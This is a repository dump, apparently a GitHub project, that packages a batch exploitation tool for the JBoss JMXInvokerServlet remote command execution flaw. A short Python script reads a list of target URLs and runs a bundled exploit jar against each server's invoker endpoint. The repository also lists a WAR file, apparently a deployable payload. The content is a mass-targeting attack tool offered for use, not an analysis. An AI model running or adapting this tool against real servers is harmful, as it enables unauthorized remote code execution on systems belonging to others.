├── .gitattributes
├── .gitignore
├── EXP.py
├── README.md
├── cx.jpg
├── jboss_exploit_fat.jar
├── ok.jpg
├── test.war
└── 使用说明.txt


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | 
 7 | # Standard to msysgit
 8 | *.doc	 diff=astextplain
 9 | *.DOC	 diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot  diff=astextplain
13 | *.DOT  diff=astextplain
14 | *.pdf  diff=astextplain
15 | *.PDF	 diff=astextplain
16 | *.rtf	 diff=astextplain
17 | *.RTF	 diff=astextplain
18 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | 
  5 | # C extensions
  6 | *.so
  7 | 
  8 | # Distribution / packaging
  9 | .Python
 10 | env/
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | lib/
 17 | lib64/
 18 | parts/
 19 | sdist/
 20 | var/
 21 | *.egg-info/
 22 | .installed.cfg
 23 | *.egg
 24 | 
 25 | # PyInstaller
 26 | #  Usually these files are written by a python script from a template
 27 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 28 | *.manifest
 29 | *.spec
 30 | 
 31 | # Installer logs
 32 | pip-log.txt
 33 | pip-delete-this-directory.txt
 34 | 
 35 | # Unit test / coverage reports
 36 | htmlcov/
 37 | .tox/
 38 | .coverage
 39 | .cache
 40 | nosetests.xml
 41 | coverage.xml
 42 | 
 43 | # Translations
 44 | *.mo
 45 | *.pot
 46 | 
 47 | # Django stuff:
 48 | *.log
 49 | 
 50 | # Sphinx documentation
 51 | docs/_build/
 52 | 
 53 | # PyBuilder
 54 | target/
 55 | 
 56 | # =========================
 57 | # Operating System Files
 58 | # =========================
 59 | 
 60 | # OSX
 61 | # =========================
 62 | 
 63 | .DS_Store
 64 | .AppleDouble
 65 | .LSOverride
 66 | 
 67 | # Thumbnails
 68 | ._*
 69 | 
 70 | # Files that might appear on external disk
 71 | .Spotlight-V100
 72 | .Trashes
 73 | 
 74 | # Directories potentially created on remote AFP share
 75 | .AppleDB
 76 | .AppleDesktop
 77 | Network Trash Folder
 78 | Temporary Items
 79 | .apdisk
 80 | 
 81 | # Windows
 82 | # =========================
 83 | 
 84 | # Windows image file caches
 85 | Thumbs.db
 86 | ehthumbs.db
 87 | 
 88 | # Folder config file
 89 | Desktop.ini
 90 | 
 91 | # Recycle Bin used on file shares
 92 | $RECYCLE.BIN/
 93 | 
 94 | # Windows Installer files
 95 | *.cab
 96 | *.msi
 97 | *.msm
 98 | *.msp
 99 | 
100 | # Windows shortcuts
101 | *.lnk
102 | 


--------------------------------------------------------------------------------
/EXP.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | def check(url):
 3 |     cmd = 'java -jar jboss_exploit_fat.jar -i '+url+'invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName'
 4 |     p = os.popen(cmd)
 5 |     print p.read(),url
 6 | if __name__ == '__main__':
 7 | 
 8 | 
 9 |     fp=open("url.txt", "r")
10 |     alllines=fp.readlines()
11 |     fp.close()
12 |     for eachline in alllines:
13 |             eachline=eachline.strip('\n')
14 |             eachline=eachline.strip(' ')
15 |             check(eachline)


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## [关于]
2 | JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution​ 漏洞批量检测
3 | ## [效果]
4 | ![INDEX](/cx.jpg)
5 | ## [成功率]
6 | ![OK](/ok.jpg)
7 | 
8 | 
9 | http://az0ne.lofter.com/


--------------------------------------------------------------------------------
/cx.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/az0ne/jboss_autoexploit/704dcf1863914dd520b79c05ee1f7674c0bae2b3/cx.jpg


--------------------------------------------------------------------------------
/jboss_exploit_fat.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/az0ne/jboss_autoexploit/704dcf1863914dd520b79c05ee1f7674c0bae2b3/jboss_exploit_fat.jar


--------------------------------------------------------------------------------
/ok.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/az0ne/jboss_autoexploit/704dcf1863914dd520b79c05ee1f7674c0bae2b3/ok.jpg


--------------------------------------------------------------------------------
/test.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/az0ne/jboss_autoexploit/704dcf1863914dd520b79c05ee1f7674c0bae2b3/test.war


--------------------------------------------------------------------------------
/使用说明.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/az0ne/jboss_autoexploit/704dcf1863914dd520b79c05ee1f7674c0bae2b3/使用说明.txt


--------------------------------------------------------------------------------